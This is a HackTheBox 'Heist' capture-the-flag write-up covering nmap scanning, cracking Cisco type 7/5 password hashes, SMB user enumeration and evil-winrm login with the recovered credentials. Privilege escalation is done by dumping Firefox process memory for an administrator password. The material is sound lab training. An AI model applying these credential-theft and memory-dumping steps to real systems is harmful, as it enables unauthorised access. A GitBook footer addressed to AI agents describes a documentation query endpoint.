> For the complete documentation index, see [llms.txt](https://choochisiang.gitbook.io/report/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://choochisiang.gitbook.io/report/hackthebox/heist-easy.md). # Heist (Easy) ## Enumeration ### Nmap ``` nmap -sC -sV -oA nmap/10.10.10.149 10.10.10.149 ``` ``` Nmap scan report for 10.10.10.149 Host is up (0.11s latency). Not shown: 997 filtered ports PORT STATE SERVICE VERSION 80/tcp open http Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc Microsoft Windows RPC 445/tcp open microsoft-ds? Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-09T16:24:17 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 9 12:24:52 2021 -- 1 IP address (1 host up) scanned in 72.60 seconds ``` ``` # Nmap 7.91 scan initiated Fri Jul 9 12:47:56 2021 as: nmap -vv --reason -Pn -A --osscan-guess --version-all -p- -oN /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/_full_tcp_nmap.txt -oX /home/kali/Boxes/Hackthebox/Hiest/results/10.10.10.149/scans/xml/_full_tcp_nmap.xml 10.10.10.149 Nmap scan report for 10.10.10.149 Host is up, received user-set (0.090s latency). Scanned at 2021-07-09 12:47:57 EDT for 350s Not shown: 65530 filtered ports Reason: 65530 no-responses PORT STATE SERVICE REASON VERSION 80/tcp open http syn-ack Microsoft IIS httpd 10.0 | http-cookie-flags: | /: | PHPSESSID: |_ httponly flag not set | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/10.0 | http-title: Support Login Page |_Requested resource was login.php 135/tcp open msrpc syn-ack Microsoft Windows RPC 445/tcp open microsoft-ds? syn-ack 5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49669/tcp open msrpc syn-ack Microsoft Windows RPC Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows Host script results: |_clock-skew: 0s | p2p-conficker: | Checking for Conficker.C or higher... | Check 1 (port 20087/tcp): CLEAN (Timeout) | Check 2 (port 48515/tcp): CLEAN (Timeout) | Check 3 (port 25486/udp): CLEAN (Timeout) | Check 4 (port 40753/udp): CLEAN (Timeout) |_ 0/4 checks are positive: Host is CLEAN or ports are blocked | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2021-07-09T16:53:10 |_ start_date: N/A Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . # Nmap done at Fri Jul 9 12:53:47 2021 -- 1 IP address (1 host up) scanned in 350.69 seconds ``` As usual, I will check port 80 and port 445 ### Port 80 ![](/files/-Mg5Ns0b2YpmMhrd05Tf) We can see a page like this and we are able to login as guest. ![](/files/-Mg5P-X9EtPX7ZC0LvqU) When we click the attachment shown at user Hazard, we can see this ![](/files/-Mg5PCMuWveUl2l4dds7) Upon researching, we know that type 7 password is crack-able. We can use this [website](https://packetlife.net/toolbox/type7/) to crack it. Meanwhile, for the type 5 password, we can use John-The-Ripper to crack it. | Hash | Password | | ---------------------------------- | ----------------- | | 02375012182C1A1D751618034F36415408 | Q4)sJu\Y8qz\*A3?d | | 0242114B0E143F015F5D1E161713 | $uperP\@ssword | | $1$pdQG$o8nrSzsGXeaduXrjlvKc91 | stealth1agent | After tons of trying, finally can login to SMB using the correct pair of credentials. ``` smbclient --list //10.10.10.149/IPC$ -U hazard%stealth1agent ``` ![](/files/-Mg5SI7Nf1XJ08MmznPy) Then, I proceed to use **impacket-lookupsid** to find other possible users. ``` impacket-lookupsid hazard:stealth1agent@10.10.10.149 ``` ![](/files/-Mg5SeUasK9dBdXcoV9O) We can see there are user **Chase** and **Jason**. From the nmap full tcp scan, we know that port 5985 is for win-rm that can let us to login to the system. ## User We can use user **Chase** and the password **Q4)sJu\Y8qz\*A3?d** ``` evil-winrm -i 10.10.10.149 -u Chase -p "Q4)sJu\Y8qz*A3?d" ``` ![](/files/-Mg5TKleRtZ6L-yW50yh) Got user flag ! ![](/files/-Mg5U7WMnFiIr_o9kIwW) ## Privilege Escalation after some enumeration, we can see that Mozilla Firefox is installed in the machine. ![](/files/-Mg5Uk4UeV2_QKTjjnVY) From the ps command, we can see that there are few Firefox processes running. ![](/files/-Mg5VZnH-4WrtzrD7K5b) We can use [ProcDump64](https://api.256file.com/procdump64.exe/en-download-190118.html) to dump all the information inside the processes, then use [strings](https://ss64.com/nt/strings.html) to extract the information. ![](/files/-Mg5Xb8W-oNctGHm82u7) ``` ./procdump64.exe -accepteula -ma 6728 ``` ![](/files/-Mg5YNlt5r4jlQ2_0qZv) We can see there is a dump being created Now we can use strings.exe to pipe the readable input to a file. ``` ./strings.exe -accepteula firefox.exe_210802_163838.dmp > readable.txt ``` After that, we can download the file that we have readable strings. When I use sublime to search for the password, it shows this ![](/files/-Mg5ZTyAP-w8jJ_K1o0z) Then, we can proceed to login as administrator using the password shown. ![](/files/-Mg5_Us6A2GS7mv-eNqv) ![](/files/-Mg5_d4WAj9DtdL6W9qu) Congratz ! --- # Agent Instructions This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com. ## Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://choochisiang.gitbook.io/report/hackthebox/heist-easy.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.